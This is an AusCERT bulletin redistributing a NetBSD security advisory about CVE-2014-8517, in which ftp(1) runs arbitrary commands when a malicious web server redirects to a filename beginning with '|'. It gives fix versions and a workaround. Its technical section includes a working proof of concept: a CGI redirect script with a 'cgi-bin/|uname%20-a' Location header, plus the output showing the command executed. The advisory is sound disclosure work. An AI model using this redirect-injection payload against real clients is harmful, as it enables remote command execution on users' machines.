-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2014.2029
 ftp(1) can be made to execute arbitrary commands by a malicious webserver
                              4 November 2014

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:          ftp
Publisher:        NetBSD
Operating System: NetBSD
                  UNIX variants (UNIX, Linux, OSX)
Impact/Access:    Execute Arbitrary Code/Commands -- Remote with User Interaction
Resolution:       Patch/Upgrade
CVE Names:        CVE-2014-8517  

Comment: This advisory references vulnerabilities in products which run on 
         platforms other than NetBSD. It is recommended that administrators 
         running ftp check for an updated version of the software for their 
         operating system.

- --------------------------BEGIN INCLUDED TEXT--------------------

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		NetBSD Security Advisory 2014-013
		=================================

Topic:		ftp(1) can be made to execute arbitrary commands
		by a malicious webserver


Version:	NetBSD-current:		source prior to Oct 27th, 2014
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected
		NetBSD 5.1 - 5.1.4:	affected
		NetBSD 5.2 - 5.2.2:	affected
		pkgsrc (net/tnftp)	affected

Severity:	remote command execution

Fixed:		NetBSD-current:		Oct 26th, 2014
		NetBSD-7 branch:	Oct 26th, 2014
		NetBSD-6-0 branch:	Oct 27th, 2014
		NetBSD-6-1 branch:	Oct 27th, 2014
		NetBSD-6 branch:	Oct 27th, 2014
		NetBSD-5-2 branch:	Oct 27th, 2014
		NetBSD-5-1 branch:	Oct 27th, 2014
		NetBSD-5 branch:	Oct 27th, 2014
		pkgsrc:			in version 20141031

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 5.1 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

A malicious http server can cause ftp(1) to execute arbitrary commands.

This vulnerability has been assigned CVE-2014-8517.


Technical Details
=================

If the ftp(1) program is used to act as http client and fetch data from
a website, and no output file is passed via the -o argument, the client
can be tricked into executing arbitrary commands.
When acting as http client, the ftp(1) program will follow http redirects,
and uses the part of the path after the last '/' from the last resource
it accesses as the output filename (as long as -o filename is not
specified).

After the output filename is resolved by the ftp client, if the rest
of the output filename begins with a '|', the output filename is
passed to popen(3).

Thus, a malicious web site could hide '|command' in a redirect and make
the client execute 'command' when ftp fetched that URL.

     a20$ pwd
     /var/www/cgi-bin
     a20$ ls -l
     total 4
     -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
     -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
     a20$ cat redirect
     #!/bin/sh
     echo 'Status: 302 Found'
     echo 'Content-Type: text/html'
     echo 'Connection: keep-alive'
     echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
     echo
     a20$

     a20$ ftp http://localhost/cgi-bin/redirect
     Trying ::1:80 ...
     ftp: Can't connect to `::1:80': Connection refused
     Trying 127.0.0.1:80 ...
     Requesting http://localhost/cgi-bin/redirect
     Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
     Requesting http://192.168.2.19/cgi-bin/|uname%20-a
         32      101.46 KiB/s
     32 bytes retrieved in 00:00 (78.51 KiB/s)
     NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36
     ADT 2014
     Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE
     BOARD evbarm
     a20$


Solutions and Workarounds
=========================

Workaround: specifying an output filename by using "ftp -o <filename>"
circumvents the issue.

Solution:
Get a new ftp binary:

VERS being your NetBSD version
DATE being a build date past the fix date for your version
ARCH being your machine architecture
ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz
cd /
tar xzpf /var/tmp/base.tgz ./usr/bin/ftp

or build a new ftp binary from source.

Affected file: src/usr.bin/ftp/fetch.c
Fixed versions:
HEAD         1.206
netbsd-7     1.205.4.1
netbsd-6     1.195.2.2
netbsd-6-1   1.195.8.1
netbsd-6-0   1.195.6.1
netbsd-5     1.185.6.3
netbsd-5-2   1.185.6.2.4.1
netbsd-5-1   1.185.14.1



Thanks To
=========

Thanks to Jared McNeill, who found the issue by code inspection, and
Christos Zoulas for changing ftp(1) to only use | commands for user
supplied names.


Revision History
================

	2014-11-03	Initial release


More Information
================

Advisories may be updated as new information becomes available.
The most recent version of this advisory (PGP signed) can be found at 
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2014-013.txt.asc

Information about NetBSD and NetBSD security can be found at
http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ .


Copyright 2014, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2014-013.txt,v 1.1 2014/11/02 22:17:45 spz Exp $

- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.15 (NetBSD)

iQIcBAEBAgAGBQJUV/DOAAoJEAZJc6xMSnBuWXsP/0JHubPskhuwiD04WK3QKqxS
7pI2767yoGuXQwdzEiIYiy2h3Fu8nc/ajLEeUwBn4opEI2tXOTkspjdMO+zqFN+Z
vl53ohkfVbRu9lgNIrwhXNrdqMa4RUZDbeurjHtwL27Jie/Pn34S+F1KW3Y8HF9Z
+byMgh/NQ0MVtntekjsji1K1v2RLCeFtj/fqPNT5qS0V9Q3YAfga2k7YJLpt1gVF
ELJBXLdc9E1V0F8fmq6KMVWgAQbNOwblTsmFEJB6dzTsDq8S1uJMeiRSOxYcwIAL
0SR3por56VO+T+55cxCiE6dDgG1gXrSO/4E+Qg/7EartswwGNGCKdLL/8uouEa4z
MWVpI9n8SqcunbhOMfs6RiMvCc8IU+IZUm5oafwZg6UcgesFVv+svv5yOFEWx9Ao
WQjoUrENY04P2fDHaA8wNWOgNltTqlRlghUUd/1BFABdRdZVy9GSs4q/dFkX9u2K
O/+584pAiUPJO5TvF21GkRCWXkAx8xBXpKvIWTquIyf1zMX0YwRdLC86eLScLJX+
30pl49nJnf0QMIcucdl2BLp+XAtKAwqq4DXCS7TQHLmB2gA6QAmAR1pnjuKnPesC
AXvzXxV2+JPCQv38N7GAOYVdURObfjhiubCFErWvRkF+fv19cLYxz48knouXbOgR
WDYihwgW4aBgf6EOkXCE
=JRi/
- -----END PGP SIGNATURE-----

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBVFgZOxLndAQH1ShLAQIlfA/8CYYBMZtC/r8z6F7korT8hj0NiDpzmax2
G2AZWd7MRCNXMAtBRecy798UMJG3R4JzDUIieh+dEJbaAQzOApl2nNoJjiBIda88
JrX1NV73BJGlOHJie4MYWojTUA91MT64RcnT+9g7jqIMGroxFQPmdD1mw/F2rZ+U
8rT+8+866VogAPJP+uSpQ9G2m30mp3NtW0tqSgoa2egpG4cuwSE9v/V9sUPSXDje
RFuZmDnUT1XXYQfcbKm/4eVp16R7ZYvsNaCdtihk8nIEX/tT2splfXVvY5h4sCPC
uBKosOzlAVMKz75Yc8tlhtrba+gflRlG5pLl4MCAPzfazUT999Bg0qPxinpIgFlP
N6E76bbv5JkMlUb+rPoVrQK5b8DfYBFgKIgNQhC3unVmsiH2RWd2hnJmKOeZaNXZ
of/Ma0Wts//qE/XHTtk+/ApctF0TrPQRp8mdcRkJbtU5hmsh2HSE1aEglT9+MMD6
Z/ke8wWktp8oJQOsj6hpqqA00WBTL5TAyFOheUyX7saShr+uLlkyYnoNa1L34fH6
aD7FTFCeM4p1TOR/79NndtrR9xN84x4s8kqadhy8YQlZIYZ4TcL6lRStkhiKuyBg
sdB+0QCETd26d0jtrT56wUp3g/rgxbdXC5EP85++gc/76KCAJ+8mT6x/QRDr5tl+
qDVvU4KavkA=
=bxlE
-----END PGP SIGNATURE-----